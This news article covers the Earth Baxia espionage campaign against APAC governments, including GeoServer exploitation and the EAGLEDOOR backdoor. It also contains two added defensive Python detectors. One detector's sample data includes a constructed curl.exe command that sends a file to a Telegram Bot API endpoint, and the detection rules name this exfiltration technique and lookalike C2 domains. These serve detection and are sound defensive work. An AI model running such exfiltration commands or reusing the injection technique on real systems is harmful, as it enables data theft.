Chinese Hackers Exploit GeoServer Flaw to Target APAC Nations with EAGLEDOOR Malware


Sep 23, 2024 | Ravie Lakshmanan | Cyber Espionage / Malware


A suspected advanced persistent threat (APT) originating from China targeted a government organization in Taiwan, and possibly other countries in the Asia-Pacific (APAC) region, by exploiting a recently patched critical security flaw affecting OSGeo GeoServer GeoTools.

The intrusion activity, which was detected by Trend Micro in July 2024, has been attributed to a threat actor dubbed Earth Baxia.

"Based on the collected phishing emails, decoy documents, and observations from incidents, it appears that the targets are primarily government agencies, telecommunication businesses, and the energy industry in the Philippines, South Korea, Vietnam, Taiwan, and Thailand," researchers Ted Lee, Cyris Tseng, Pierre Lee, Sunny Lu, and Philip Chen said.


The discovery of lure documents written in Simplified Chinese points to China being one of the affected countries as well, although the cybersecurity company said it does not have enough information to determine which sectors within the country were singled out.

The multi-stage infection chain uses two different initial access techniques, spear-phishing emails and exploitation of the GeoServer flaw (CVE-2024-36401, CVSS score: 9.8), to ultimately deliver Cobalt Strike and a previously unknown backdoor codenamed EAGLEDOOR, which allows for information gathering and payload delivery.

"The threat actor employs GrimResource and AppDomainManager injection to deploy additional payloads, aiming to lower the victim's guard," the researchers noted, adding that the former technique is used to download next-stage malware via a decoy MSC file dubbed RIPCOY embedded within a ZIP archive attachment.
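AppDomainManager injection relies on a documented .NET feature: if a trusted application's `.exe.config` (or the `APPDOMAIN_MANAGER_ASM` / `APPDOMAIN_MANAGER_TYPE` environment variables) names an AppDomainManager assembly and type, the CLR loads that assembly inside the trusted process before the application's own entry point runs. The following is an added example, not code from Trend Micro or from the article, showing a check that a responder can run over `.config` files collected from a host; the sample configs, the `Loader` assembly name and the `Loader.Manager` type are constructed for illustration and are not indicators from the campaign.

```python
"""Check .NET application config files for an AppDomainManager hook.

Added example; the mechanism is the standard .NET <runtime> configuration:
  <runtime>
    <appDomainManagerAssembly value="AssemblyName, Version=..."/>
    <appDomainManagerType value="Namespace.TypeName"/>
  </runtime>
A config like this dropped beside a signed .exe makes that .exe load the
named assembly. The same hook can be set with the APPDOMAIN_MANAGER_ASM and
APPDOMAIN_MANAGER_TYPE environment variables.
"""
import os
import xml.etree.ElementTree as ET


def appdomain_manager_from_config(config_xml: str):
    """Return (assembly, type) if the config sets an AppDomainManager, else None."""
    root = ET.fromstring(config_xml)
    runtime = root.find("runtime")
    if runtime is None:
        return None
    asm = runtime.find("appDomainManagerAssembly")
    typ = runtime.find("appDomainManagerType")
    if asm is None or typ is None:
        return None
    return asm.get("value", ""), typ.get("value", "")


def appdomain_manager_from_env(env=None):
    """Return (assembly, type) if the environment sets the hook, else None."""
    env = os.environ if env is None else env
    asm = env.get("APPDOMAIN_MANAGER_ASM")
    typ = env.get("APPDOMAIN_MANAGER_TYPE")
    return (asm, typ) if asm and typ else None


def scan_configs(configs):
    """Map config name -> (assembly, type) for every config that sets the hook."""
    hits = {}
    for name, xml_text in configs.items():
        found = appdomain_manager_from_config(xml_text)
        if found:
            hits[name] = found
    return hits


# Constructed sample configs (not real artifacts from the campaign).
INJECTED_CONFIG = """<configuration>
  <runtime>
    <appDomainManagerAssembly value="Loader, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" />
    <appDomainManagerType value="Loader.Manager" />
  </runtime>
</configuration>"""

BENIGN_CONFIG = """<configuration>
  <startup>
    <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.8" />
  </startup>
</configuration>"""

SAMPLE_CONFIGS = {
    "trusted_tool.exe.config": INJECTED_CONFIG,
    "other_app.exe.config": BENIGN_CONFIG,
}

if __name__ == "__main__":
    for name, (asm, typ) in scan_configs(SAMPLE_CONFIGS).items():
        print(f"{name}: AppDomainManager set to {asm} / {typ}")
    env_hit = appdomain_manager_from_env()
    if env_hit:
        print(f"environment sets AppDomainManager: {env_hit}")
```

A hit is not proof of compromise by itself; some legitimate hosting frameworks configure an AppDomainManager. The useful signal is a config whose assembly lives next to a signed binary that has no reason to use one, which is why the check reports the assembly name rather than a verdict.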


It is worth mentioning here that Japanese cybersecurity company NTT Security Holdings recently detailed an activity cluster with links to APT41 that it said used the same two techniques to target Taiwan, the Philippine military, and Vietnamese energy organizations.

It is likely that these two intrusion sets are related, given the overlapping use of Cobalt Strike command-and-control (C2) domains that mimic Amazon Web Services and Microsoft Azure (e.g., "s3cloud-azure," "s2cloud-amazon," and "s3bucket-azure") and Trend Micro itself ("trendmicrotech").

The end goal of the attacks is to deploy a custom variant of Cobalt Strike, which acts as a launchpad for the EAGLEDOOR backdoor ("Eagle.dll") via DLL side-loading.


The malware supports four methods of communicating with the C2 server: DNS, HTTP, TCP, and Telegram. While the first three protocols are used to transmit the victim's status, the core functionality is realized via the Telegram Bot API, which is used to upload and download files and execute additional payloads. The harvested data is exfiltrated via curl.exe.
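Two things in this report translate directly into detection logic: C2 hostnames built from cloud-provider and vendor brand names that do not resolve under the real vendor zones, and a command-line `curl.exe` talking to the Telegram Bot API (whose calls take the form `https://api.telegram.org/bot<token>/<method>`). The block below is an added example written for this article, not Trend Micro's code; it runs both checks over a handful of constructed endpoint/proxy events. The full hostnames in the sample events (`update.s3cloud-azure.com`, `trendmicrotech.net`) and the bot token are constructed around the labels the article reports; they are not indicators from the campaign, and the two-label "registrable domain" heuristic is an assumption that a real deployment should replace with a public-suffix list.

```python
"""Flag cloud-brand lookalike C2 hosts and Telegram Bot API use by curl.exe.

Added example for the tradecraft described in the article; the sample events
below are constructed, not captured telemetry.
"""
import re
from urllib.parse import urlsplit

# Brand tokens the reported C2 domains imitated, and the zones where those
# brands legitimately live. Assumption: a host carrying one of these tokens
# whose registrable domain is NOT a legitimate zone is suspicious.
BRAND_TOKENS = ("amazon", "azure", "s3cloud", "s2cloud", "s3bucket", "trendmicro")
LEGIT_ZONES = {
    "amazonaws.com", "amazon.com", "azure.com", "azure.net", "azureedge.net",
    "microsoft.com", "windows.net", "trendmicro.com",
}

# Telegram Bot API calls look like https://api.telegram.org/bot<id>:<secret>/<method>
TELEGRAM_BOT = re.compile(r"https?://api\.telegram\.org/bot\d+:[\w-]+/\w+", re.I)


def registrable_domain(host: str) -> str:
    """Last two labels of the host. Simplified on purpose (assumption)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def lookalike_cloud_host(host: str) -> bool:
    """True if the host borrows a cloud/vendor brand outside the vendor's zones."""
    host = host.lower()
    if registrable_domain(host) in LEGIT_ZONES:
        return False
    return any(tok in host for tok in BRAND_TOKENS)


def telegram_bot_call(text: str) -> bool:
    """True if the text contains a Telegram Bot API URL."""
    return bool(TELEGRAM_BOT.search(text))


def analyse(events):
    """Return [(event_index, rule_name)] for every event that trips a rule."""
    hits = []
    for i, ev in enumerate(events):
        proc = ev.get("process", "").lower()
        url = ev.get("url", "")
        host = ev.get("dest_host") or urlsplit(url).hostname or ""
        if telegram_bot_call(url) or telegram_bot_call(ev.get("cmdline", "")):
            rule = "telegram-bot-api"
            if proc.endswith("curl.exe"):
                rule += "+curl"  # living-off-the-land exfil, as in the report
            hits.append((i, rule))
        if host and lookalike_cloud_host(host):
            hits.append((i, "cloud-lookalike-host"))
    return hits


# Constructed events: process, command line / URL, destination host.
SAMPLE_EVENTS = [
    {"process": "curl.exe",
     "cmdline": 'curl.exe -F "document=@C:\\Users\\Public\\out.zip" '
                "https://api.telegram.org/bot123456:AAExampleToken/sendDocument",
     "url": "https://api.telegram.org/bot123456:AAExampleToken/sendDocument"},
    {"process": "svchost.exe", "dest_host": "update.s3cloud-azure.com"},
    {"process": "chrome.exe", "dest_host": "mybucket.s3.amazonaws.com"},
    {"process": "Telegram.exe", "dest_host": "api.telegram.org"},
    {"process": "outlook.exe", "dest_host": "trendmicrotech.net"},
]

if __name__ == "__main__":
    for idx, rule in analyse(SAMPLE_EVENTS):
        print(f"event {idx} ({SAMPLE_EVENTS[idx]['process']}): {rule}")
```

The desktop Telegram client in event 3 is deliberately not flagged: the signal is the `/bot<token>/` path of the Bot API, not Telegram traffic as such, which keeps the rule usable in environments where the messenger is permitted.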

"Earth Baxia, likely based in China, conducted a sophisticated campaign targeting government and energy sectors in multiple APAC countries," the researchers pointed out.

"They used advanced techniques like GeoServer exploitation, spear-phishing, and customized malware (Cobalt Strike and EAGLEDOOR) to infiltrate and exfiltrate data. The use of public cloud services for hosting malicious files and the multi-protocol support of EAGLEDOOR highlight the complexity and adaptability of their operations."
